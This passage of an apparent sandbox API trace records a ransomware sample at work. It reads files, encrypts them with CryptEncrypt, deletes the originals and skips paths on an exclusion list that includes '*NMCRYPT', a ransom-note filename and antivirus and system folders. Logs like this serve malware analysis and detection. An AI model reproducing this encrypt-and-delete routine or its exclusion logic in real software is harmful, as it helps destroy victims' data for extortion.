lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.643] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.643] GetLastError () returned 0x0 [0166.643] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.643] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.643] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.643] GetLastError () returned 0x0 [0166.643] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.643] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.643] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.643] GetLastError () returned 0x0 [0166.643] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.643] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.643] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.643] GetLastError () returned 0x0 [0166.643] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.643] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.643] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.643] GetLastError () returned 0x0 [0166.643] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.643] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x98, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x98, lpOverlapped=0x0) returned 1 [0166.644] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x98, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xa0) returned 1 [0166.644] GetLastError () returned 0x0 [0166.644] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xa0, lpOverlapped=0x0) returned 1 [0166.644] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.644] WriteFile (in: hFile=0x15c4, lpBuffer=0x2892040*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.644] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb")) returned 0x20 [0166.644] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb", dwFileAttributes=0x20) returned 1 [0166.650] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 1 [0166.650] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb")) returned 1 [0166.651] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0166.651] wcslen (_String="OK") returned 0x2 [0166.651] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.651] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.651] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0166.651] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0166.651] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0166.651] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*NMCRYPT") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*Recovers your files.html") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*.exe") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*.dll") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*.lnk") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*.bat") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*.ini") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*.msi") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*.scf") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*pagefile.sys*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*AppData*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*\\winrar\\*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*\\java\\*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*\\windows\\*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*\\ESET\\*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*\\AVG\\*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*Atheros*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*Realtek*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*bootmgr*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*boot*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*boot*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*IO.SYS*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*ntldr*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*chrome*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*opera*") returned 0 [0166.651] PathMatchSpecW (pszFile="vstoee90.tlb", pszSpec="*firefox*") returned 0 [0166.651] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb", pszSpec="*") returned 1 [0166.652] strlen (_Str="NMoreira") returned 0x8 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.652] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.653] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.654] CryptGenRandom 